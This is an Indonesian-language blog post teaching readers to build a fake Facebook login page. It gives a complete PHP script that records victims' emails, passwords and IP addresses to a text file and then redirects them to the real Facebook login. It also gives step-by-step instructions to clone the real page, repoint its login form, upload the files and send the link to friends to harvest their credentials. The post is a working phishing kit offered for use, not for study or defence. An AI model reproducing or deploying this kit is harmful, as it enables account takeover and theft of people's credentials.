Arif's Blog: Hack Facebook Dgn Fake Login

Sekarang banyak banget yang tanya sana sini, “Bagaimana seh membuat fake login?”. Mending kalo cuman itu, nanti yang lain tanya cara buat untuk Facebook, yang satu untuk Gmail, Yahoo, Blogger dan yah apa aja dah.

Pada prinsipnya fake login adalah sama saja, tinggal kita hanya mengganti beberapa perintah.

Penasaran?

Nah yang harus kita siapkan adalah 2 buah file yang bernama logs.php dan logs.txt (Terserah kalian lah mau kasih nama apa… ).

Bisa Kan Buat File PHP-nya??? Klo Ga Bisa Gw ajarin cara yang paling mudah dulu.. ( ga perlu program mysql ato sejenisnya)

Pertama : Loe Download Dulu Notepad ++ ( search di google )

Kedua : klik new

Ketiga : Copy Semua Isi File "logs.php"

Isi File logs.php

<?php
$file = "logs.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");

$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "n");
fwrite($handle, "n");
fclose($handle);
echo "<script LANGUAGE="JavaScript">
window.location="https://login.facebook.com/login.php?login_attempt=1";
</script>";
?>

Ke Empat : Save dengan nama "logs.php"

Perhatikan, untuk kedepannya yang perlu kalian ubah adalah perintah yang berwarna merah.

Dah inget aja itu dulu, ngerti belakangan aja… Sekarang target kita maunya apa? Facebook? Oke.

Buka Facebook dan liat source codenya / CTRL+U…

Yang perlu kalian cari adalah INPUT ID dari kedua TEXT FIELD berikut…

Kalo emang gak tau cara nyarinya, didalam text field tersebut kan ada tulisan Email dan Password. Copy aja dan coba search.

Done, ternyata untuk Email IDnya adalah email dan untuk Password IDnya pass. Buka logs.php dan ganti baris berikut.

$username = $_POST['email'];
$password = $_POST['pass'];

Nah pada contoh kali ini sudah sama yaitu email dan pass (ituloh yang ada di dalam $_POST). Kemudian pada baris

window.location="https://login.facebook.com/login.php?login_attempt=1";

Ganti URLnya jadi alamat asli atau alamat tempat sang korban ter-redirect ketika melakukan login pada Fake Login yang telah kita buat. Pada contoh kali ini adalah alamat asli login facebook.

Langkah selanjutnya adalah mengcopy seluruh source code facebook dan simpan di dalam index.php (buat dulu filenya.).

Gunakan fasilitas search dan cari kata form method dan liat action-nya

<form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form">

Kalau di facebook form actionnya adalah “https://login.facebook.com/login.php?login_attempt=1” nah ganti menjadi logs.php.

Ingat, gak semua website memiliki 1 form action…Kadang ada yang punya lebih dari satu. Kalo facebook kan ada yang untuk login dan register.

Pokoknya teliti dan cari yang berhubungan sama LOGIN. Kemudian upload ketiga file tersebut dan kasih linknya ke teman kamu.

Belom ngerti juga?

Kalian harus ingat langkah – langkahnya yah…

1. Cari website yang mau dibuatin fake loginnya.

2. Cari INPUT ID dari TEXT FIELD atau tempat kita nulis email dan passwordnya.

3. Setelah dapet buka logs.php dan ganti pada bagian ini $_POST['email'];

4. Ganti juga bagian ini window.location=\”https://login.facebook.com/login.php?login_attempt=1\”; untuk me-redirect korban ketika melakukan login pada fake login kita (disarankan untuk me-redirect ke halaman login aslinya.

5. Copy keseluruhan source code dari website aslinya pada index.php dan cari form method yang berhubungan dengan login dan ganti actionnya menjadi logs.php.

6. Upload ketiga file tersebut, kasih linknya ke siapa saja dan tunggu hasilnya.

7. Hasil Kita Ambil di Logs.txt